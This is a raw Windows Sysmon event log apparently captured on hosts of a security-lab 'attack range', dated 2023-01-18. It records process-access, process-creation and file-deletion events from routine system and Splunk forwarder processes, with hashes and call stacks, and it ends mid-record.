12:17:29.100{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832284C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039915Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:29.100{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832284C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039914Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:29.100{FE4C2B44-D9F3-63C7-0500-00000000AF02}408424C:\Windows\system32\csrss.exe{FE4C2B44-E359-63C7-0106-00000000AF02}5796C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000039913Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:29.100{FE4C2B44-DA67-63C7-AA00-00000000AF02}20924876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{FE4C2B44-E359-63C7-0106-00000000AF02}5796C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000039912Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:29.101{FE4C2B44-E359-63C7-0106-00000000AF02}5796C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{FE4C2B44-D9F3-63C7-E703-000000000000}0x3e70SystemMD5=679D3E04F6AB7B10FF27D06B29C27A12,SHA256=FF1B5220C99EA6173BE693E1C2D700873ADE2F8A73F503FC0D297EA0792756D1,IMPHASH=05D58741E22C6453F52C1A9326FAF02D{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000039911Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:29.054{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=449D6313FAEB15C7CDBE6764D766B093,SHA256=6653216EBE5466D7A5CE1685D44338DFC8984EA3E6064CD3A96BF16A68746151,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000015244Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:30.567{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=366F49B3E35476D4FA79552B3EC73613,SHA256=D8E7E7F4C4AE376E2374D3407EED5B9517B6B23DD8394ABF54F1EE2AD06CA4B7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000015243Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:30.567{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9504B485D3DBE7635CD6BB8DDE798E95,SHA256=672B41B9917BB97214A549145DF26B0592CC1DC7B108A5238F88FC97A537A2A6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000015242Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:30.566{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=9F32FBD9653C0BE8C86601D310DC8957,SHA256=8FFAC59FC14959364CE2428EEB4B4845C46C3C22C1BB90B4BD6E7049120FE72F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000015241Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:30.541{E5A8D418-DCC0-63C7-A300-00000000B002}9683180C:\Windows\system32\conhost.exe{E5A8D418-E35A-63C7-E201-00000000B002}3084C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015240Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:30.541{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015239Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:30.541{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015238Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:30.541{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015237Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:30.541{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015236Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:30.541{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015235Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:30.541{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015234Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:30.541{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015233Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:30.541{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015232Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:30.541{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015231Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:30.541{E5A8D418-DC43-63C7-0500-00000000B002}416432C:\Windows\system32\csrss.exe{E5A8D418-E35A-63C7-E201-00000000B002}3084C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000015230Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:30.541{E5A8D418-DCC0-63C7-9F00-00000000B002}30963280C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{E5A8D418-E35A-63C7-E201-00000000B002}3084C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000015229Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:30.541{E5A8D418-E35A-63C7-E201-00000000B002}3084C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.2.5Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{E5A8D418-DC43-63C7-E703-000000000000}0x3e70SystemMD5=92BD3C71158FA8B9A0821D43564A56E7,SHA256=7850C91F8D08679D7A0579D350C08CA6F6EDEA8A12226ADC2E30B4ABF8CE0BE2,IMPHASH=FD2D4472615B421BAEF1D51F46EF5F52{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000039948Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:30.702{FE4C2B44-E35A-63C7-0306-00000000AF02}69326940C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6ae795|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6ae2c6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+643d8|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+65dfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+9dcf50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000039947Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:30.592{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\spool\splunk\tracker.logMD5=0D1B4DD4C5FE9FBC7F711708FB1454FF,SHA256=C9A3081D030EAE8BABE9906BF08E2095F9E41D10BF98823C873B20B4099CEEFE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000039946Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:30.545{FE4C2B44-DA67-63C7-AE00-00000000AF02}49123668C:\Windows\system32\conhost.exe{FE4C2B44-E35A-63C7-0306-00000000AF02}6932C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039945Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:30.545{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832284C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039944Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:30.545{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832284C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039943Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:30.545{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832284C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039942Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:30.545{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832284C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039941Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 